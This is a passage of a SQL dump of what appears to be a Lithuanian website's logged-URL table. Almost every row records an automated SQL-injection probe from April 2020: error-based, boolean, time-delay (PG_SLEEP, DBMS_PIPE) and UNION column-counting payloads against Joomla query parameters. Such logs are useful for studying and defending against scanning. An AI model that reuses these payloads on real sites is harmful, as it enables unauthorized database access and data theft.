00:00:00'),(3538,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jkPG&Itemid=213','','','',1,0,'2020-04-08 18:25:57','0000-00-00 00:00:00'),(3539,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ECcQ&Itemid=213','','','',1,0,'2020-04-08 18:25:58','0000-00-00 00:00:00'),(3540,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) AND (SELECT 6273 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(6273=6273,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND','','','',1,0,'2020-04-08 18:26:41','0000-00-00 00:00:00'),(3541,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 AND (SELECT 6273 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(6273=6273,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)','','','',1,0,'2020-04-08 18:26:42','0000-00-00 00:00:00'),(3542,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 AND (SELECT 6273 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(6273=6273,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MG','','','',1,0,'2020-04-08 18:26:45','0000-00-00 00:00:00'),(3543,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) AND 1507=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1507=1507) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR','','','',1,0,'2020-04-08 18:26:49','0000-00-00 00:00:00'),(3544,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 AND 1507=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1507=1507) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(','','','',1,0,'2020-04-08 18:26:50','0000-00-00 00:00:00'),(3546,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) AND 7176 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7176=7176) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+C','','','',1,0,'2020-04-08 18:26:57','0000-00-00 00:00:00'),(3547,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 AND 7176 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7176=7176) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CH','','','',1,0,'2020-04-08 18:26:59','0000-00-00 00:00:00'),(3549,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) AND 2017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2017=2017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(11','','','',1,0,'2020-04-08 18:27:06','0000-00-00 00:00:00'),(3550,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 AND 2017=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2017=2017) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113','','','',1,0,'2020-04-08 18:27:07','0000-00-00 00:00:00'),(3552,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=(SELECT 7537 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(7537=7537,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)','','','',1,0,'2020-04-08 18:27:13','0000-00-00 00:00:00'),(3553,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=(SELECT CONCAT(0x71766a7071,(SELECT (ELT(3049=3049,1))),0x716a766271))','','','',1,0,'2020-04-08 18:27:14','0000-00-00 00:00:00'),(3554,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=(SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8948=8948) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)))','','','',1,0,'2020-04-08 18:27:16','0000-00-00 00:00:00'),(3555,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1892=1892) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))','','','',1,0,'2020-04-08 18:27:17','0000-00-00 00:00:00'),(3556,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213);SELECT PG_SLEEP(5)--','','','',1,0,'2020-04-08 18:27:18','0000-00-00 00:00:00'),(3557,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213;SELECT PG_SLEEP(5)--','','','',1,0,'2020-04-08 18:27:19','0000-00-00 00:00:00'),(3558,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(67)||CHR(97)||CHR(71),5) FROM DUAL--','','','',1,0,'2020-04-08 18:27:31','0000-00-00 00:00:00'),(3559,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(67)||CHR(97)||CHR(71),5) FROM DUAL--','','','',1,0,'2020-04-08 18:27:32','0000-00-00 00:00:00'),(3560,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) ORDER BY 1-- ubVc','','','',1,0,'2020-04-08 18:27:35','0000-00-00 00:00:00'),(3561,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) ORDER BY 6703-- zJjv','','','',1,0,'2020-04-08 18:27:36','0000-00-00 00:00:00'),(3562,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL-- Gany','','','',1,0,'2020-04-08 18:27:37','0000-00-00 00:00:00'),(3563,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL-- RrgZ','','','',1,0,'2020-04-08 18:27:39','0000-00-00 00:00:00'),(3564,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL-- hclB','','','',1,0,'2020-04-08 18:27:40','0000-00-00 00:00:00'),(3565,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL-- pjDR','','','',1,0,'2020-04-08 18:27:41','0000-00-00 00:00:00'),(3566,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- kUBn','','','',1,0,'2020-04-08 18:27:42','0000-00-00 00:00:00'),(3567,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- KdWH','','','',1,0,'2020-04-08 18:27:44','0000-00-00 00:00:00'),(3568,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MEXr','','','',1,0,'2020-04-08 18:27:46','0000-00-00 00:00:00'),(3569,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rFuJ','','','',1,0,'2020-04-08 18:27:48','0000-00-00 00:00:00'),(3570,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nHCi','','','',1,0,'2020-04-08 18:27:49','0000-00-00 00:00:00'),(3571,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vfOP','','','',1,0,'2020-04-08 18:27:50','0000-00-00 00:00:00'),(3572,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 ORDER BY 1-- SilH','','','',1,0,'2020-04-08 18:27:51','0000-00-00 00:00:00'),(3573,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 ORDER BY 5050-- gDtC','','','',1,0,'2020-04-08 18:27:52','0000-00-00 00:00:00'),(3574,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL-- kBPt','','','',1,0,'2020-04-08 18:27:53','0000-00-00 00:00:00'),(3575,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL-- gnoy','','','',1,0,'2020-04-08 18:27:56','0000-00-00 00:00:00'),(3576,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL-- oMiH','','','',1,0,'2020-04-08 18:27:58','0000-00-00 00:00:00'),(3577,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL-- fmoA','','','',1,0,'2020-04-08 18:27:59','0000-00-00 00:00:00'),(3578,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Aypp','','','',1,0,'2020-04-08 18:28:00','0000-00-00 00:00:00'),(3579,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- cdcX','','','',1,0,'2020-04-08 18:28:01','0000-00-00 00:00:00'),(3580,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JjUM','','','',1,0,'2020-04-08 18:28:02','0000-00-00 00:00:00'),(3581,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QSMh','','','',1,0,'2020-04-08 18:28:03','0000-00-00 00:00:00'),(3582,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wNml','','','',1,0,'2020-04-08 18:28:04','0000-00-00 00:00:00'),(3583,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Hoti','','','',1,0,'2020-04-08 18:28:05','0000-00-00 00:00:00'),(3584,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 ORDER BY 1-- Rpsw','','','',1,0,'2020-04-08 18:28:06','0000-00-00 00:00:00'),(3585,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 ORDER BY 8812-- bJGZ','','','',1,0,'2020-04-08 18:28:07','0000-00-00 00:00:00'),(3586,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL-- ZVCy','','','',1,0,'2020-04-08 18:28:08','0000-00-00 00:00:00'),(3587,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL-- MEtr','','','',1,0,'2020-04-08 18:28:09','0000-00-00 00:00:00'),(3588,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL-- hPWl','','','',1,0,'2020-04-08 18:28:10','0000-00-00 00:00:00'),(3589,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL-- RJQz','','','',1,0,'2020-04-08 18:28:11','0000-00-00 00:00:00'),(3590,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- YvQv','','','',1,0,'2020-04-08 18:28:12','0000-00-00 00:00:00'),(3591,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- KRTc','','','',1,0,'2020-04-08 18:28:13','0000-00-00 00:00:00'),(3592,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FrGd','','','',1,0,'2020-04-08 18:28:15','0000-00-00 00:00:00'),(3593,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dFNo','','','',1,0,'2020-04-08 18:28:15','0000-00-00 00:00:00'),(3594,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nAAU','','','',1,0,'2020-04-08 18:28:16','0000-00-00 00:00:00'),(3595,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jxYu','','','',1,0,'2020-04-08 18:28:18','0000-00-00 00:00:00'),(3596,'http://infotytuvenai.lt/index.php/lt/wp-json/wp/v2/posts','','','',1,0,'2020-04-10 15:09:05','0000-00-00 00:00:00'),(3597,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(9327=9327,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1566=1566&view=article&id=33','','','',1,0,'2020-04-13 00:20:53','0000-00-00 00:00:00'),(3598,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(9327=9327,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:20:55','0000-00-00 00:00:00'),(3599,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(9327=9327,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VOut&view=article&id=33&Itemid=1','','','',1,0,'2020-04-13 00:21:04','0000-00-00 00:00:00'),(3600,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 2963=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2963=2963) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC) AND (8090=8','','','',1,0,'2020-04-13 00:21:07','0000-00-00 00:00:00'),(3601,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 2963=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2963=2963) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC)&view=article','','','',1,0,'2020-04-13 00:21:09','0000-00-00 00:00:00'),(3602,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 2963=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (2963=2963) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)) AS NUMERIC)-- HEDf&view=','','','',1,0,'2020-04-13 00:21:17','0000-00-00 00:00:00'),(3603,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 1219 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1219=1219) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113))) AND (6502=','','','',1,0,'2020-04-13 00:21:20','0000-00-00 00:00:00'),(3604,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1219 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1219=1219) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113)))&view=articl','','','',1,0,'2020-04-13 00:21:22','0000-00-00 00:00:00'),(3605,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1219 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1219=1219) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113)))-- zOum&view','','','',1,0,'2020-04-13 00:21:28','0000-00-00 00:00:00'),(3606,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 7753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7753=7753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(98)||CHR(113','','','',1,0,'2020-04-13 00:21:29','0000-00-00 00:00:00'),(3607,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 7753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7753=7753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(98)||CHR(113)','','','',1,0,'2020-04-13 00:21:30','0000-00-00 00:00:00'),(3609,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 3506 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(3506=3506,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:21:41','0000-00-00 00:00:00'),(3610,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x716b717a71,(SELECT (ELT(3024=3024,1))),0x716b627171))&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:21:43','0000-00-00 00:00:00'),(3611,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (1997=1997) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)))&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:21:45','0000-00-00 00:00:00'),(3612,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8480=8480) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113))&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:21:48','0000-00-00 00:00:00'),(3613,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT PG_SLEEP(5)--&view=article&id=33&Itemid=196','','','',3,0,'2020-04-13 00:21:50','0000-00-00 00:00:00'),(3614,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT PG_SLEEP(5)--&view=article&id=33&Itemid=196','','','',3,0,'2020-04-13 00:21:53','0000-00-00 00:00:00'),(3615,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(88)||CHR(76)||CHR(112),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:09','0000-00-00 00:00:00'),(3616,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(88)||CHR(76)||CHR(112),5) FROM DUAL--&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:11','0000-00-00 00:00:00'),(3617,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- OhTk&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:28','0000-00-00 00:00:00'),(3618,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- gvYV&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:31','0000-00-00 00:00:00'),(3619,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- vFAx&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:33','0000-00-00 00:00:00'),(3620,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- lFYc&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:35','0000-00-00 00:00:00'),(3621,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- fQRt&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:36','0000-00-00 00:00:00'),(3622,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- vMtH&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:37','0000-00-00 00:00:00'),(3623,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ZTjQ&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:39','0000-00-00 00:00:00'),(3624,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- NZVI&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:40','0000-00-00 00:00:00'),(3625,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gpEB&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:42','0000-00-00 00:00:00'),(3626,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IviG&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:46','0000-00-00 00:00:00'),(3627,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UVyi&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:48','0000-00-00 00:00:00'),(3628,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- CuVO&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:51','0000-00-00 00:00:00'),(3629,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- oaDq&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:53','0000-00-00 00:00:00'),(3630,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- cNAS&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:22:56','0000-00-00 00:00:00'),(3631,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- AwnY&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:00','0000-00-00 00:00:00'),(3632,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- BSnT&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:02','0000-00-00 00:00:00'),(3633,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- LSmE&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:05','0000-00-00 00:00:00'),(3634,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- NsPg&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:08','0000-00-00 00:00:00'),(3635,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kTBI&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:09','0000-00-00 00:00:00'),(3636,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mDjy&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:11','0000-00-00 00:00:00'),(3637,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gKDi&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:12','0000-00-00 00:00:00'),(3638,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bTXe&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:23:13','0000-00-00 00:00:00'),(3639,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- sDaW&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:21','0000-00-00 00:00:00'),(3640,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- xgtB&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:22','0000-00-00 00:00:00'),(3641,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- phwS&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:24','0000-00-00 00:00:00'),(3642,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- XhsR&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:26','0000-00-00 00:00:00'),(3643,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- agCI&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:30','0000-00-00 00:00:00'),(3644,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- QwRS&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:32','0000-00-00 00:00:00'),(3645,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- HYrI&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:35','0000-00-00 00:00:00'),(3646,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aUZi&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:39','0000-00-00 00:00:00'),(3647,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jLVz&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:42','0000-00-00 00:00:00'),(3648,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zWbh&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:44','0000-00-00 00:00:00'),(3649,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- UZBU&view=article&id=33&Itemid=196','','','',1,0,'2020-04-13 00:24:47','0000-00-00 00:00:00'),(3650,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 6980 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT 